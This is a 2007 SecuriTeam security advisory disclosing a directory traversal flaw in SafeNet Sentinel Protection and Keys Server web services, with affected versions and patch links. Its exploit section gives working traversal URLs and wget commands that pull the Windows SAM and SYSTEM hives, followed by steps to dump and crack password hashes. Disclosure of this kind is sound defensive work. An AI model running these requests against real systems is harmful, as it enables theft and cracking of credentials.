Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	SafeNet Sentinel Protection Server and Keys Server Directory Traversal 27 Nov. 2007    Summary SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server products include web servers which are vulnerable to directory traversal attacks. A remote attacker could exploit these vulnerabilities to read arbitrary files with the permissions of the web server, typically SYSTEM.   Credit: The information has been provided by Elliot Kendall. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Sentinel Protection Server version 7.0.0 through version 7.4.0 and possibly below  * Sentinel Keys Server version 1.0.3 and possibly below Immune Systems:  * Sentinel Protection Server version 7.4.1  * Sentinel Keys Server version 1.0.4 Sentinel Protection Server and Sentinel Keys Server run web servers on ports 6002 and 7002, respectively, to allow remote monitoring of key use. The web server software does not santize request paths correctly before using them in system calls. As a result, an attacker can request files outside the web server's directory root by using the ../ notation to refer to the parent directory of the current directory. Impact: A remote attacker could exploit this vulnerability to read sensitive files on the affected system. Attractive targets include the SAM registry hive which contains system password hashes. Solution: Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys Server version 1.0.4. First upgrade the Sentinel Driver software to version 7.4.0 if you are using an earlier version: http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip Then install "Security Patch to Sentinel Protection Installer 7.4.0" http://safenet-inc.com/support/files/SPI740SecurityPatch.zip Exploit: Most popular web browsers are not be able to display URLs exploiting this problem. We recommend using wget or lynx instead. Substitute port 7002 to target Keys Server instead of Protection Server. This example will retrieve the C:\boot.ini file. http://XX.XX.XX.XX:6002/../../../../../../boot.ini This example will retrieve a copy of the target system's SAM registry hive from the Windows repair folder: http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam With the SAM and SYSTEM registry hives, it is possible to extract the system's local password hashes for offline cracking. For example, using the bkhive, samdump2, and John the Ripper tools: $ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam $ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system $ bkhive system keyfile $ samdump2 sam keyfile > hashes $ john --wordlist=all hashes  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Novell Zenworks Software Packaging LaunchHelp.dll Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Microsoft Internet Explorer swapNode Handling Code Execution Vulnerability Microsoft Internet Explorer Select Element Insufficient Type Checking Code Execution Vulnerability Internet Explorer Select Element Cache Code Execution Vulnerability Microsoft Office Graph DataFormat Signed Index Code Execution Vulnerability Microsoft Office Excel Conditional Expression Ptg Type Confusion Vulnerability Microsoft Internet Explorer Protected Mode Bypass Vulnerability Microsoft Internet Explorer 9 STYLE Object Parsing Code Execution Vulnerability Microsoft Internet Explorer XSLT SetViewSlave Code Execution Vulnerability CA Total Defense Suite Gateway Security Malformed HTTP Packet Code Execution Vulnerability HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Code Execution Vulnerability TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability Symantec Veritas Storage Foundation vxsvc.exe Unicode Code Execution Vulnerability HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®